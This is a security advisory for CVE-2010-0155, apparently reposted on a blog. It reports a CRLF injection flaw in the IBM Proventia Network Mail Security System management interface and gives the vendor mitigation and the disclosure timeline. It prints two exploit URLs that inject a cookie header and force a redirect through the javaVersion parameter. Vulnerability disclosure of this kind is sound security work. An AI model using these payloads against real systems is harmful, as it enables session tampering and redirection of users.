crlf注入漏洞 java解决办法_CVE-2010-0155 IBM Proventia Network Mail Security System Local Management Interfac...

Security Advisory:MVSA-10-009 / CVE-2010-0155

Vendor: IBM

Products: Proventia Network Mail Security System

Vulnerabilities: CRLF Injection

Risk: Medium

Attack Vector: From Remote

Authentication:Required

Reference:http://www.ventuneac.net/security-advisories/MVSA-10-009

Description

Web-based Local Management Interface (LMI) of IBM Proventia Network Mail Security System appliance (firmware 1.6) is vulnerable to a CRLF Injection vulnerability. When exploited by an authenticated attacker, such vulnerability could lead to compromising the security of the appliance, allowing injection of custom HTTP cookies, forcing external redirects, potential HTTP Response Splitting attacks, etc.

The affected resource is not part of the IBM PNMSS firmware 2.5.

By manipulating the javaVersion parameter of load.php resource, an authenticated attacker can perform the attacks above.

The following exploit allows injecting custom cookies used by the client browser during a valid HTTP session:

url_placeholder/load.php?browVerOK=true&browVerPerfect=false&javaVersion

=any%0D%0ASet-cookie:%20MyOwnCookie=SOME_DATA_HERE&javaVendor=Sun%20Microsystems%20Inc.&javaEnabled=true&welcome=true&detectionFlag=1&popupBlocked=no

The following exploit allows forcing external browser redirects:

url_placeholder/load.php?browVerOK=true&browVerPerfect=false&javaVersion

=any%0D%0ALocation:%20http://www.google.com%0D%0A&javaVendor=Sun%20Microsystems%20Inc.&javaEnabled=true&welcome=true&detectionFlag=1&popupBlocked=no

Affected Versions

IBM Proventia Network Mail Security System - virtual appliance (firmware 1.6)

Mitigation

Vendor recommends upgrading to PNMSS firmware 2.5 or later.

Alternatively, please contact IBM for technical support.

Disclosure Timeline

2009, November 07: Vulnerabilities discovered and documented

2009, November 08: Notification sent to IBM

2009, November 09: IBM acknowledges receiving the report

2010, September 12: MVSA-10-009 advisory published.

Credits

Dr. Marian Ventuneac

http://ventuneac.net

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值